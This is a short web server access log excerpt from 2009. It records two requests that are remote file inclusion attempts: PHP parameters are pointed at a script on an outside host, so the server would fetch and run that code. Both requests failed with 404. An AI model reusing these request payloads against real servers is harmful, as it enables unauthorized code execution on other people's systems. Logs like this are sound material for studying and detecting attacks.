69.10.159.229 - - [26/Jun/2009:13:41:35 -0500] "GET /logs/access_log.1242000000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:13:41:49 -0500] "GET /module.php?mod=http://www.unreals.co.cc/idxx.txt%20? HTTP/1.1" 404 293 "-""Mozilla/5.0"
